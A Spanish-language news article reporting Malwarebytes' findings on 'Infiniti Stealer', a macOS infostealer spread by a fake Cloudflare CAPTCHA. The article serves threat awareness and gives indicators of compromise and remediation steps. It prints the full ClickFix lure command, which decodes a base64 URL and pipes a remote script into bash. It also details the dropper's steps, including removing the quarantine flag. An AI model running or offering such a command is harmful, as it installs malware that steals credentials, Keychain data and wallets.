Infiniti Stealer: malware para macOS que emplea ClickFix con CAPTCHA falso
Toni Martinez 
Alerta por un malware que afecta a los sistemas de macOS.
Malwarebytes detecta infostealer que roba credenciales de navegadores, Keychain y wallets en equipos Apple.
Los investigadores de Malwarebytes Labs han identificado Infiniti Stealer, un nuevo malware dirigido a macOS que roba datos sensibles mediante la técnica ClickFix. La amenaza se distribuye a través de una página web falsa que imita un CAPTCHA de Cloudflare en el dominio update-check[.]com. El proceso inicia el 26 de marzo de 2026 durante una caza de amenazas rutinaria, con publicación detallada el 31 de marzo. Afecta a usuarios de ordenadores Apple, adaptando métodos previamente usados en Windows.
El malware se propaga mediante una página CAPTCHA fraudulenta que indica «verificación humana» y proporciona un comando para copiar y pegar en Terminal. El comando es: bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode)). Este decodifica una URL del mismo dominio y descarga el primer estadio (stage 1): un script bash dropper con hash MD5 da73e42d1f9746065f061a6e85e28f0c.
La cronología de infección es la siguiente:
- Estadio 1: El dropper decodifica su payload embebido, escribe el estadio 2 en /tmp, elimina la bandera de cuarentena con
xattr -dr com.apple.quarantine, ejecuta el binario connohuppasando variables de entorno (servidor C2 y token de autenticación), se autoelimina y cierra Terminal mediante AppleScript. - Estadio 2: Binario Mach-O para Apple Silicon (~8,6 MB), con cabecera
4b 41 59 28 b5 2f fd(KAY + zstd). Descomprime ~35 MB de datos embebidos y lanza el estadio final. - Estadio 3: Stealer en Python 3.11 compilado con Nuitka en modo onefile, nombrado UpdateHelper[.]bin. Expone miles de símbolos nombrados para reconstrucción de módulos.
Los datos extraídos incluyen credenciales de navegadores basados en Chromium y Firefox, entradas del Keychain de macOS, wallets de criptomonedas, secretos en texto plano de archivos de desarrolladores (.env) y capturas de pantalla durante ejecución. La exfiltración se realiza vía peticiones HTTP POST al servidor C2 (update-check[.]com/m/7d8df27d95d9). Al finalizar, envía notificación por Telegram al operador y encola credenciales para cracking de contraseñas en servidor.
Entre los indicadores de compromiso (IoCs) figuran:
- SHA256 del estadio 3: 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958.
- Dominios C2: update-check[.]com; panel operador: Infiniti-stealer[.]com.
- Logs: /tmp/.bs_debug.log.
- Ruta temporal: /tmp/.2835b1b5098587a9XXXXXX (prefijo fijo, sufijo aleatorio).
El malware evade detección comprobando entornos de análisis (any.run, Joe Sandbox, Hybrid Analysis, VMware, VirtualBox), introduciendo retrasos aleatorios y usando compilación Nuitka para generar binarios nativos. No se menciona persistencia vía LaunchAgents, limitándose a ejecución temporal en /tmp.
En contexto operativo, esta amenaza demuestra la adaptación de ClickFix —técnica social engineering de Windows— a macOS, cuestionando su percepción como plataforma de bajo riesgo. Para fuerzas de seguridad y analistas de riesgo, los IoCs permiten cacerías proactivas en endpoints Apple: monitoreo de dominios C2, hashes en EDR y revisión de /tmp. La carga útil Python/Nuitka complica el análisis estático, recomendando herramientas como Ghidra o IDA para descompilación.
Actualmente, el panel de operador en Infiniti-stealer[.]com indica actividad continua desde su detección. Las implicaciones operativas incluyen riesgo para credenciales sensibles en sectores de protección: cesar uso del equipo infectado para banca o correo, cambiar contraseñas desde dispositivo limpio (priorizando email, banca y Apple ID), revocar sesiones/API/SSH y escanear con Malwarebytes. Los CAPTCHA legítimos no requieren comandos en Terminal.